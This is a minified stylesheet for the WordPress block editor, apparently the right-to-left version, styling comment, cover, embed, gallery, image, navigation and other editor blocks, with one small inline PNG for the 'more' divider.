.wp-block-comments__legacy-placeholder,.wp-block-post-comments{ box-sizing:border-box; } .wp-block-comments__legacy-placeholder .alignleft,.wp-block-post-comments .alignleft{ float:right; } .wp-block-comments__legacy-placeholder .alignright,.wp-block-post-comments .alignright{ float:left; } .wp-block-comments__legacy-placeholder .navigation:after,.wp-block-post-comments .navigation:after{ clear:both; content:""; display:table; } .wp-block-comments__legacy-placeholder .commentlist,.wp-block-post-comments .commentlist{ clear:both; list-style:none; margin:0; padding:0; } .wp-block-comments__legacy-placeholder .commentlist .comment,.wp-block-post-comments .commentlist .comment{ min-height:2.25em; padding-right:3.25em; } .wp-block-comments__legacy-placeholder .commentlist .comment p,.wp-block-post-comments .commentlist .comment p{ font-size:1em; line-height:1.8; margin:1em 0; } .wp-block-comments__legacy-placeholder .commentlist .children,.wp-block-post-comments .commentlist .children{ list-style:none; margin:0; padding:0; } .wp-block-comments__legacy-placeholder .comment-author,.wp-block-post-comments .comment-author{ line-height:1.5; } .wp-block-comments__legacy-placeholder .comment-author .avatar,.wp-block-post-comments .comment-author .avatar{ border-radius:1.5em; display:block; float:right; height:2.5em; margin-left:.75em; margin-top:.5em; width:2.5em; } .wp-block-comments__legacy-placeholder .comment-author cite,.wp-block-post-comments .comment-author cite{ font-style:normal; } .wp-block-comments__legacy-placeholder .comment-meta,.wp-block-post-comments .comment-meta{ font-size:.875em; line-height:1.5; } .wp-block-comments__legacy-placeholder .comment-meta b,.wp-block-post-comments .comment-meta b{ font-weight:400; } .wp-block-comments__legacy-placeholder .comment-meta .comment-awaiting-moderation,.wp-block-post-comments .comment-meta .comment-awaiting-moderation{ display:block; margin-bottom:1em; margin-top:1em; } .wp-block-comments__legacy-placeholder .comment-body .commentmetadata,.wp-block-post-comments .comment-body .commentmetadata{ font-size:.875em; } .wp-block-comments__legacy-placeholder .comment-form-author label,.wp-block-comments__legacy-placeholder .comment-form-comment label,.wp-block-comments__legacy-placeholder .comment-form-email label,.wp-block-comments__legacy-placeholder .comment-form-url label,.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{ display:block; margin-bottom:.25em; } .wp-block-comments__legacy-placeholder .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-comments__legacy-placeholder .comment-form textarea,.wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{ box-sizing:border-box; display:block; width:100%; } .wp-block-comments__legacy-placeholder .comment-form-cookies-consent,.wp-block-post-comments .comment-form-cookies-consent{ display:flex; gap:.25em; } .wp-block-comments__legacy-placeholder .comment-form-cookies-consent #wp-comment-cookies-consent,.wp-block-post-comments .comment-form-cookies-consent #wp-comment-cookies-consent{ margin-top:.35em; } .wp-block-comments__legacy-placeholder .comment-reply-title,.wp-block-post-comments .comment-reply-title{ margin-bottom:0; } .wp-block-comments__legacy-placeholder .comment-reply-title :where(small),.wp-block-post-comments .comment-reply-title :where(small){ font-size:var(--wp--preset--font-size--medium, smaller); margin-right:.5em; } .wp-block-comments__legacy-placeholder .reply,.wp-block-post-comments .reply{ font-size:.875em; margin-bottom:1.4em; } .wp-block-comments__legacy-placeholder input:not([type=submit]),.wp-block-comments__legacy-placeholder textarea,.wp-block-post-comments input:not([type=submit]),.wp-block-post-comments textarea{ border:1px solid #949494; font-family:inherit; font-size:1em; } .wp-block-comments__legacy-placeholder input:not([type=submit]):not([type=checkbox]),.wp-block-comments__legacy-placeholder textarea,.wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{ padding:calc(.667em + 2px); } :where(.wp-block-post-comments input[type=submit],.wp-block-comments__legacy-placeholder input[type=submit]){ border:none; } .wp-block-comments{ box-sizing:border-box; } .block-library-comments-toolbar__popover .components-popover__content{ min-width:230px; } .wp-block-comments__legacy-placeholder *{ pointer-events:none; } .wp-block-comment-author-avatar__placeholder{ border:1px dashed; height:100%; width:100%; stroke:currentColor; stroke-dasharray:3; } .wp-block[data-align=center]>.wp-block-comments-pagination{ justify-content:center; } :where(.editor-styles-wrapper) .wp-block-comments-pagination{ max-width:100%; } .wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{ font-size:inherit; } .wp-block-comments-pagination-numbers a{ text-decoration:underline; } .wp-block-comments-pagination-numbers .page-numbers{ margin-left:2px; } .wp-block-comments-pagination-numbers .page-numbers:last-child{ margin-right:0; } .wp-block-comments-title.has-background{ padding:inherit; } .wp-block-cover.is-placeholder{ align-items:stretch; display:flex; min-height:240px; padding:0 !important; } .wp-block-cover.is-placeholder .components-placeholder.is-large{ justify-content:flex-start; z-index:1; } .wp-block-cover.is-placeholder:focus:after{ min-height:auto; } .wp-block-cover.components-placeholder h2{ color:inherit; } .wp-block-cover.is-transient{ position:relative; } .wp-block-cover.is-transient:before{ background-color:#fff; content:""; height:100%; opacity:.3; position:absolute; width:100%; z-index:1; } .wp-block-cover.is-transient .wp-block-cover__inner-container{ z-index:2; } .wp-block-cover .components-spinner{ margin:0; position:absolute; right:50%; top:50%; transform:translate(50%, -50%); } .wp-block-cover .wp-block-cover__inner-container{ margin-left:0; margin-right:0; text-align:right; } .wp-block-cover .wp-block-cover__placeholder-background-options{ width:100%; } .wp-block-cover .wp-block-cover__image--placeholder-image{ bottom:0; left:0; position:absolute; right:0; top:0; } [data-align=left]>.wp-block-cover,[data-align=right]>.wp-block-cover{ max-width:420px; width:100%; } .block-library-cover__reset-button{ margin-right:auto; } .block-library-cover__resize-container{ bottom:0; left:0; min-height:50px; position:absolute !important; right:0; top:0; } .components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .block-library-cover__resize-container,.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .components-popover__content>div{ overflow:visible; pointer-events:none; } .block-editor-block-patterns-list__list-item .has-parallax.wp-block-cover{ background-attachment:scroll; } .color-block-support-panel__inner-wrapper>:not(.block-editor-tools-panel-color-gradient-settings__item){ margin-top:24px; } .wp-block-details summary div{ display:inline; } .wp-block-embed{ clear:both; margin-left:0; margin-right:0; } .wp-block-embed.is-loading{ display:flex; justify-content:center; } .wp-block-embed .wp-block-embed__placeholder-input{ flex:1 1 auto; } .wp-block-embed .components-placeholder__error{ word-break:break-word; } .wp-block-post-content .wp-block-embed__learn-more a{ color:var(--wp-admin-theme-color); } .block-library-embed__interactive-overlay{ bottom:0; left:0; opacity:0; position:absolute; right:0; top:0; } .wp-block[data-align=left]>.wp-block-embed,.wp-block[data-align=right]>.wp-block-embed{ max-width:360px; width:100%; } .wp-block[data-align=left]>.wp-block-embed .wp-block-embed__wrapper,.wp-block[data-align=right]>.wp-block-embed .wp-block-embed__wrapper{ min-width:280px; } .wp-block[data-align=left]>.wp-block-file,.wp-block[data-align=right]>.wp-block-file{ height:auto; } .wp-block[data-align=center]>.wp-block-file{ text-align:center; } .wp-block-file{ align-items:center; display:flex; flex-wrap:wrap; justify-content:space-between; margin-bottom:0; } .wp-block-file .components-resizable-box__container{ margin-bottom:1em; } .wp-block-file .wp-block-file__preview{ height:100%; margin-bottom:1em; width:100%; } .wp-block-file .wp-block-file__preview-overlay{ bottom:0; left:0; position:absolute; right:0; top:0; } .wp-block-file .wp-block-file__content-wrapper{ flex-grow:1; } .wp-block-file a{ min-width:1em; } .wp-block-file a:not(.wp-block-file__button){ display:inline-block; } .wp-block-file .wp-block-file__button-richtext-wrapper{ display:inline-block; margin-right:.75em; } .wp-block-form-input .is-input-hidden{ background:repeating-linear-gradient(-45deg, #0000, #0000 5px, currentColor 0, currentColor 6px); border:1px dashed; box-sizing:border-box; font-size:.85em; opacity:.3; padding:.5em; } .wp-block-form-input .is-input-hidden input[type=text]{ background:#0000; } .wp-block-form-input.is-selected .is-input-hidden{ background:none; opacity:1; } .wp-block-form-input.is-selected .is-input-hidden input[type=text]{ background:unset; } .wp-block-form-submission-notification>*{ background:repeating-linear-gradient(-45deg, #0000, #0000 5px, currentColor 0, currentColor 6px); border:1px dashed; box-sizing:border-box; opacity:.25; } .wp-block-form-submission-notification.is-selected>*,.wp-block-form-submission-notification:has(.is-selected)>*{ background:none; opacity:1; } .wp-block-form-submission-notification.is-selected:after,.wp-block-form-submission-notification:has(.is-selected):after{ display:none !important; } .wp-block-form-submission-notification:after{ align-items:center; display:flex; font-size:1.1em; height:100%; justify-content:center; position:absolute; right:0; top:0; width:100%; } .wp-block-form-submission-notification.form-notification-type-success:after{ content:attr(data-message-success); } .wp-block-form-submission-notification.form-notification-type-error:after{ content:attr(data-message-error); } .wp-block-freeform.block-library-rich-text__tinymce{ height:auto; } .wp-block-freeform.block-library-rich-text__tinymce li,.wp-block-freeform.block-library-rich-text__tinymce p{ line-height:1.8; } .wp-block-freeform.block-library-rich-text__tinymce ol,.wp-block-freeform.block-library-rich-text__tinymce ul{ margin-right:0; padding-right:2.5em; } .wp-block-freeform.block-library-rich-text__tinymce blockquote{ border-right:4px solid #000; box-shadow:inset 0 0 0 0 #ddd; margin:0; padding-right:1em; } .wp-block-freeform.block-library-rich-text__tinymce pre{ color:#1e1e1e; font-family:Menlo,Consolas,monaco,monospace; font-size:15px; white-space:pre-wrap; } .wp-block-freeform.block-library-rich-text__tinymce>:first-child{ margin-top:0; } .wp-block-freeform.block-library-rich-text__tinymce>:last-child{ margin-bottom:0; } .wp-block-freeform.block-library-rich-text__tinymce.mce-edit-focus{ outline:none; } .wp-block-freeform.block-library-rich-text__tinymce a{ color:var(--wp-admin-theme-color); } .wp-block-freeform.block-library-rich-text__tinymce:focus a[data-mce-selected]{ background:#e5f5fa; border-radius:2px; box-shadow:0 0 0 1px #e5f5fa; margin:0 -2px; padding:0 2px; } .wp-block-freeform.block-library-rich-text__tinymce code{ background:#f0f0f0; border-radius:2px; color:#1e1e1e; font-family:Menlo,Consolas,monaco,monospace; font-size:14px; padding:2px; } .wp-block-freeform.block-library-rich-text__tinymce:focus code[data-mce-selected]{ background:#ddd; } .wp-block-freeform.block-library-rich-text__tinymce .alignright{ float:right; margin:.5em 0 .5em 1em; } .wp-block-freeform.block-library-rich-text__tinymce .alignleft{ float:left; margin:.5em 1em .5em 0; } .wp-block-freeform.block-library-rich-text__tinymce .aligncenter{ display:block; margin-left:auto; margin-right:auto; } .wp-block-freeform.block-library-rich-text__tinymce .wp-more-tag{ background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAADtgAAAAoBAMAAAA86gLBAAAAJFBMVEVMaXG7u7vBwcHDw8POzs68vLzGxsbMzMy+vr7AwMDQ0NDGxsYKLGzpAAAADHRSTlMA///zWf+/f///TMxNVGuqAAABwklEQVR4Ae3dMXLaQBTH4bfj8UCpx8hq0vgKvgFNemhT6Qo6gg6R+0ZahM2QLmyBJ99XWP9V5+o3jIUcLQEAAAAAAAAAAAAAAAAAAAAAAABQ8j0WL9lfTtlt18uNXAUA8O/KVtfa1tdcrOdSh9gCQAMlh1hMNbZZ1bsrsQWABsrhLRbz7z5in/32UbfUMUbkMQCAh5RfGYv82UdMdZ6HS2wjT2ILAI8r3XmM2B3WvM59vfO2xXYW2yYAENuPU8S+X/N67mKxzy225yaxBQCxLV392UdcvwV0jPVUj98ntkBWT7C7+9u2/V/vGtvXIWJ6/4rtbottWa6Ri0NUT/u72LYttrb97LHdvUXMxxrb8TO2W2TF1rYbbLG1bbGNjMi4+2Sbi1FsbbvNFlvbFtt5fDnE3d9sP1/XeIyV2Nr2U2/guZUuptNrH/dPI9eLB6SaAEBs6wPJf3/PNk9tYgsAYrv/8TFuzx/fvkFqGtrEFgDEdpcZUb7ejXy6ntrEFgDENvL6gsas4vbdyKt4DACI7TxElJv/Z7udpqFNbAFAbKduy2uU2trttM/x28UWAAAAAAAAAAAAAAAAAAAAAAAAAADgDyPwGmGTCZp7AAAAAElFTkSuQmCC); background-position:50%; background-repeat:no-repeat; background-size:1900px 20px; cursor:default; display:block; height:20px; margin:15px auto; outline:0; width:96%; } .wp-block-freeform.block-library-rich-text__tinymce img::selection{ background-color:initial; } .wp-block-freeform.block-library-rich-text__tinymce div.mceTemp{ -ms-user-select:element; } .wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption{ margin:0; max-width:100%; } .wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption a,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption img{ display:block; } .wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption *{ -webkit-user-drag:none; } .wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption .wp-caption-dd{ margin:0; padding-top:.5em; } .wp-block-freeform.block-library-rich-text__tinymce .wpview{ border:1px solid #0000; clear:both; margin-bottom:16px; position:relative; width:99.99%; } .wp-block-freeform.block-library-rich-text__tinymce .wpview iframe{ background:#0000; display:block; max-width:100%; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .mce-shim{ bottom:0; left:0; position:absolute; right:0; top:0; } .wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected="2"] .mce-shim{ display:none; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .loading-placeholder{ border:1px dashed #ddd; padding:10px; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error{ border:1px solid #ddd; margin:0; padding:1em 0; word-wrap:break-word; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error p{ margin:0; text-align:center; } .wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .loading-placeholder,.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .wpview-error{ border-color:#0000; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .dashicons{ display:block; font-size:32px; height:32px; margin:0 auto; width:32px; } .wp-block-freeform.block-library-rich-text__tinymce .wpview.wpview-type-gallery:after{ clear:both; content:""; display:table; } .wp-block-freeform.block-library-rich-text__tinymce .gallery img[data-mce-selected]:focus{ outline:none; } .wp-block-freeform.block-library-rich-text__tinymce .gallery a{ cursor:default; } .wp-block-freeform.block-library-rich-text__tinymce .gallery{ line-height:1; margin:auto -6px; overflow-x:hidden; padding:6px 0; } .wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-item{ box-sizing:border-box; float:right; margin:0; padding:6px; text-align:center; } .wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption,.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-icon{ margin:0; } .wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption{ font-size:13px; margin:4px 0; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-1 .gallery-item{ width:100%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-2 .gallery-item{ width:50%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-3 .gallery-item{ width:33.3333333333%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-4 .gallery-item{ width:25%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-5 .gallery-item{ width:20%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-6 .gallery-item{ width:16.6666666667%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-7 .gallery-item{ width:14.2857142857%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-8 .gallery-item{ width:12.5%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-9 .gallery-item{ width:11.1111111111%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery img{ border:none; height:auto; max-width:100%; padding:0; } div[data-type="core/freeform"]:before{ border:1px solid #ddd; outline:1px solid #0000; } @media not (prefers-reduced-motion){ div[data-type="core/freeform"]:before{ transition:border-color .1s linear,box-shadow .1s linear; } } div[data-type="core/freeform"].is-selected:before{ border-color:#1e1e1e; } div[data-type="core/freeform"] .block-editor-block-contextual-toolbar+div{ margin-top:0; padding-top:0; } div[data-type="core/freeform"].is-selected .block-library-rich-text__tinymce:after{ clear:both; content:""; display:table; } .mce-toolbar-grp .mce-btn.mce-active button,.mce-toolbar-grp .mce-btn.mce-active i,.mce-toolbar-grp .mce-btn.mce-active:hover button,.mce-toolbar-grp .mce-btn.mce-active:hover i{ color:#1e1e1e; } .mce-toolbar-grp .mce-rtl .mce-flow-layout-item.mce-last{ margin-left:0; margin-right:8px; } .mce-toolbar-grp .mce-btn i{ font-style:normal; } .block-library-classic__toolbar{ border:1px solid #ddd; border-bottom:none; border-radius:2px; display:none; margin:0 0 8px; padding:0; position:sticky; top:0; width:auto; z-index:31; } div[data-type="core/freeform"].is-selected .block-library-classic__toolbar{ border-color:#1e1e1e; display:block; } .block-library-classic__toolbar .mce-tinymce{ box-shadow:none; } @media (min-width:600px){ .block-library-classic__toolbar{ padding:0; } } .block-library-classic__toolbar:empty{ background:#f5f5f5; border-bottom:1px solid #e2e4e7; display:block; } .block-library-classic__toolbar:empty:before{ color:#555d66; content:attr(data-placeholder); font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; line-height:37px; padding:14px; } .block-library-classic__toolbar div.mce-toolbar-grp{ border-bottom:1px solid #1e1e1e; } .block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar .mce-menubar>div,.block-library-classic__toolbar .mce-tinymce-inline,.block-library-classic__toolbar .mce-tinymce-inline>div,.block-library-classic__toolbar div.mce-toolbar-grp,.block-library-classic__toolbar div.mce-toolbar-grp>div{ height:auto !important; width:100% !important; } .block-library-classic__toolbar .mce-container-body.mce-abs-layout{ overflow:visible; } .block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar div.mce-toolbar-grp{ position:static; } .block-library-classic__toolbar .mce-toolbar-grp>div{ padding:1px 3px; } .block-library-classic__toolbar .mce-toolbar-grp .mce-toolbar:not(:first-child){ display:none; } .block-library-classic__toolbar.has-advanced-toolbar .mce-toolbar-grp .mce-toolbar{ display:block; } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{ height:50vh !important; } @media (min-width:960px){ .block-editor-freeform-modal .block-editor-freeform-modal__content:not(.is-full-screen){ height:9999rem; } .block-editor-freeform-modal .block-editor-freeform-modal__content .components-modal__header+div{ height:100%; } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-tinymce{ height:calc(100% - 52px); } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-container-body{ display:flex; flex-direction:column; height:100%; min-width:50vw; } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area{ display:flex; flex-direction:column; flex-grow:1; } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{ flex-grow:1; height:10px !important; } } .block-editor-freeform-modal__actions{ margin-top:16px; } :root :where(figure.wp-block-gallery){ display:block; } :root :where(figure.wp-block-gallery)>.blocks-gallery-caption{ flex:0 0 100%; } :root :where(figure.wp-block-gallery)>.blocks-gallery-media-placeholder-wrapper{ flex-basis:100%; } :root :where(figure.wp-block-gallery) .wp-block-image .components-notice.is-error{ display:block; } :root :where(figure.wp-block-gallery) .wp-block-image .components-notice__content{ margin:4px 0; } :root :where(figure.wp-block-gallery) .wp-block-image .components-notice__dismiss{ left:5px; position:absolute; top:0; } :root :where(figure.wp-block-gallery) .block-editor-media-placeholder.is-appender .components-placeholder__label{ display:none; } :root :where(figure.wp-block-gallery) .block-editor-media-placeholder.is-appender .block-editor-media-placeholder__button{ margin-bottom:0; } :root :where(figure.wp-block-gallery) .block-editor-media-placeholder{ margin:0; } :root :where(figure.wp-block-gallery) .block-editor-media-placeholder .components-placeholder__label{ display:flex; } :root :where(figure.wp-block-gallery) .block-editor-media-placeholder figcaption{ z-index:2; } :root :where(figure.wp-block-gallery) .components-spinner{ margin-right:-9px; margin-top:-9px; position:absolute; right:50%; top:50%; } .gallery-settings-buttons .components-button:first-child{ margin-left:8px; } .blocks-gallery-item figure:not(.is-selected):focus,.blocks-gallery-item img:focus{ outline:none; } .blocks-gallery-item figure.is-selected:before{ bottom:0; box-shadow:0 0 0 1px #fff inset, 0 0 0 3px var(--wp-admin-theme-color) inset; content:""; left:0; outline:2px solid #0000; pointer-events:none; position:absolute; right:0; top:0; z-index:1; } .blocks-gallery-item figure.is-transient img{ opacity:.3; } .blocks-gallery-item .block-editor-media-placeholder{ height:100%; margin:0; } .blocks-gallery-item .block-editor-media-placeholder .components-placeholder__label{ display:flex; } .wp-block-gallery ul.blocks-gallery-grid{ margin:0; padding:0; } @media (min-width:600px){ .wp-block-update-gallery-modal{ max-width:480px; } } .wp-block-update-gallery-modal-buttons{ display:flex; gap:12px; justify-content:flex-end; } .wp-block-group .block-editor-block-list__insertion-point{ left:0; right:0; } [data-type="core/group"].is-selected .block-list-appender{ margin-left:0; margin-right:0; } [data-type="core/group"].is-selected .has-background .block-list-appender{ margin-bottom:18px; margin-top:18px; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child{ gap:inherit; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-default-block-appender__content,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{ display:inherit; flex:1; flex-direction:inherit; width:100%; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after{ border:1px dashed; content:""; display:flex; flex:1 0 40px; min-height:38px; pointer-events:none; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child{ pointer-events:none; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-button-block-appender,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{ pointer-events:all; } .block-library-html__edit .block-library-html__preview-overlay{ height:100%; position:absolute; right:0; top:0; width:100%; } .block-library-html__edit .block-editor-plain-text{ background:#fff !important; border:1px solid #1e1e1e !important; border-radius:2px !important; box-shadow:none !important; box-sizing:border-box; color:#1e1e1e !important; display:block; font-family:Menlo,Consolas,monaco,monospace !important; font-size:16px !important; max-height:250px; padding:12px !important; } @media (min-width:600px){ .block-library-html__edit .block-editor-plain-text{ font-size:13px !important; } } .block-library-html__edit .block-editor-plain-text:focus{ border-color:var(--wp-admin-theme-color) !important; box-shadow:0 0 0 1px var(--wp-admin-theme-color) !important; outline:2px solid #0000 !important; } .block-library-html__edit .block-editor-plain-text{ direction:ltr; } .wp-block-image.wp-block-image .block-editor-media-placeholder.is-small{ min-height:60px; } figure.wp-block-image:not(.wp-block){ margin:0; } .wp-block-image{ position:relative; } .wp-block-image .is-applying img,.wp-block-image.is-transient img{ opacity:.3; } .wp-block-image figcaption img{ display:inline; } .wp-block-image .components-spinner{ margin:0; position:absolute; right:50%; top:50%; transform:translate(50%, -50%); } .wp-block-image__placeholder{ aspect-ratio:4/3; } .wp-block-image__placeholder.has-illustration:before{ background:#fff; opacity:.8; } .wp-block-image__placeholder .components-placeholder__illustration{ opacity:.1; } .block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{ left:0; margin:-1px 0; position:absolute; right:0; } @media (min-width:600px){ .block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{ margin:-1px; } } [data-align=full]>.wp-block-image img,[data-align=wide]>.wp-block-image img{ height:auto; width:100%; } .wp-block[data-align=center]>.wp-block-image,.wp-block[data-align=left]>.wp-block-image,.wp-block[data-align=right]>.wp-block-image{ display:table; } .wp-block[data-align=center]>.wp-block-image>figcaption,.wp-block[data-align=left]>.wp-block-image>figcaption,.wp-block[data-align=right]>.wp-block-image>figcaption{ caption-side:bottom; display:table-caption; } .wp-block[data-align=left]>.wp-block-image{ margin:.5em 0 .5em 1em; } .wp-block[data-align=right]>.wp-block-image{ margin:.5em 1em .5em 0; } .wp-block[data-align=center]>.wp-block-image{ margin-left:auto; margin-right:auto; text-align:center; } .wp-block[data-align]:has(>.wp-block-image){ position:relative; } .wp-block-image__crop-area{ max-width:100%; overflow:hidden; position:relative; width:100%; } .wp-block-image__crop-area .reactEasyCrop_Container{ pointer-events:auto; } .wp-block-image__crop-area .reactEasyCrop_Container .reactEasyCrop_Image{ border:none; border-radius:0; } .wp-block-image__crop-icon{ align-items:center; display:flex; justify-content:center; min-width:48px; padding:0 8px; } .wp-block-image__crop-icon svg{ fill:currentColor; } .wp-block-image__zoom .components-popover__content{ min-width:260px; overflow:visible !important; } .wp-block-image__toolbar_content_textarea__container{ padding:8px; } .wp-block-image__toolbar_content_textarea{ width:250px; } .wp-block-latest-posts>li{ overflow:hidden; } .wp-block-latest-posts li a>div{ display:inline; } :root :where(.wp-block-latest-posts){ padding-right:2.5em; } :root :where(.wp-block-latest-posts.is-grid),:root :where(.wp-block-latest-posts__list){ padding-right:0; } .wp-block-math__textarea-control textarea{ direction:ltr; font-family:Menlo,Consolas,monaco,monospace; } .wp-block-media-text__media{ position:relative; } .wp-block-media-text__media.is-transient img{ opacity:.3; } .wp-block-media-text__media .components-spinner{ margin-right:-9px; margin-top:-9px; position:absolute; right:50%; top:50%; } .wp-block-media-text .__resizable_base__{ grid-column:1 / span 2; grid-row:2; } .wp-block-media-text .editor-media-container__resizer{ width:100% !important; } .wp-block-media-text.is-image-fill .components-placeholder.has-illustration,.wp-block-media-text.is-image-fill .editor-media-container__resizer,.wp-block-media-text.is-image-fill-element .components-placeholder.has-illustration,.wp-block-media-text.is-image-fill-element .editor-media-container__resizer{ height:100% !important; } .wp-block-media-text>.block-editor-block-list__layout>.block-editor-block-list__block{ max-width:unset; } .wp-block-media-text--placeholder-image{ min-height:205px; } .block-editor-block-list__block[data-type="core/more"]{ margin-bottom:28px; margin-top:28px; max-width:100%; text-align:center; } .wp-block-more{ display:block; text-align:center; white-space:nowrap; } .wp-block-more .rich-text{ background:#fff; color:#757575; display:inline-flex; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:600; padding:10px 36px; position:relative; text-align:center; text-transform:uppercase; white-space:nowrap; } .wp-block-more:before{ border-top:3px dashed #ccc; content:""; left:0; position:absolute; right:0; top:50%; } .editor-styles-wrapper .wp-block-navigation ul{ margin-bottom:0; margin-right:0; margin-top:0; padding-right:0; } .editor-styles-wrapper .wp-block-navigation .wp-block-navigation-item.wp-block{ margin:revert; } .wp-block-navigation-item__label{ display:inline; } .wp-block-navigation-item,.wp-block-navigation__container{ background-color:inherit; } .wp-block-navigation:not(.is-selected):not(.has-child-selected) .has-child:hover>.wp-block-navigation__submenu-container{ opacity:0; visibility:hidden; } .has-child.has-child-selected>.wp-block-navigation__submenu-container,.has-child.is-selected>.wp-block-navigation__submenu-container{ display:flex; opacity:1; visibility:visible; } .is-dragging-components-draggable .has-child.is-dragging-within>.wp-block-navigation__submenu-container{ opacity:1; visibility:visible; } .is-editing>.wp-block-navigation__container{ display:flex; flex-direction:column; opacity:1; visibility:visible; } .is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container{ opacity:1; visibility:hidden; } .is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container .block-editor-block-draggable-chip-wrapper{ visibility:visible; } .is-editing>.wp-block-navigation__submenu-container>.block-list-appender{ display:block; position:static; width:100%; } .is-editing>.wp-block-navigation__submenu-container>.block-list-appender .block-editor-button-block-appender{ background:#1e1e1e; color:#fff; margin-left:0; margin-right:auto; padding:0; width:24px; } .wp-block-navigation__submenu-container .block-list-appender{ display:none; } .block-library-colors-selector{ width:auto; } .block-library-colors-selector .block-library-colors-selector__toggle{ display:block; margin:0 auto; padding:3px; width:auto; } .block-library-colors-selector .block-library-colors-selector__icon-container{ align-items:center; border-radius:4px; display:flex; height:30px; margin:0 auto; padding:3px; position:relative; } .block-library-colors-selector .block-library-colors-selector__state-selection{ border-radius:11px; box-shadow:inset 0 0 0 1px #0003; height:22px; line-height:20px; margin-left:auto; margin-right:auto; min-height:22px; min-width:22px; padding:2px; width:22px; } .block-library-colors-selector .block-library-colors-selector__state-selection>svg{ min-width:auto !important; } .block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg,.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg path{ color:inherit; } .block-library-colors-selector__popover .color-palette-controller-container{ padding:16px; } .block-library-colors-selector__popover .components-base-control__label{ height:20px; line-height:20px; } .block-library-colors-selector__popover .component-color-indicator{ float:left; margin-top:2px; } .block-library-colors-selector__popover .components-panel__body-title{ display:none; } .wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender{ background-color:#1e1e1e; color:#fff; height:24px; } .wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender.block-editor-button-block-appender.block-editor-button-block-appender{ padding:0; } .wp-block-navigation .wp-block .wp-block .block-editor-button-block-appender{ background-color:initial; color:#1e1e1e; } .components-placeholder.wp-block-navigation-placeholder{ background:none; box-shadow:none; min-height:0; outline:none; padding:0; } .components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset{ font-size:inherit; } .components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset .components-button{ margin-bottom:0; } .components-placeholder.wp-block-navigation-placeholder{ color:inherit; } .wp-block-navigation.is-selected .components-placeholder.wp-block-navigation-placeholder{ color:#1e1e1e; } .wp-block-navigation-placeholder__preview{ align-items:center; display:flex; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; min-width:96px; } 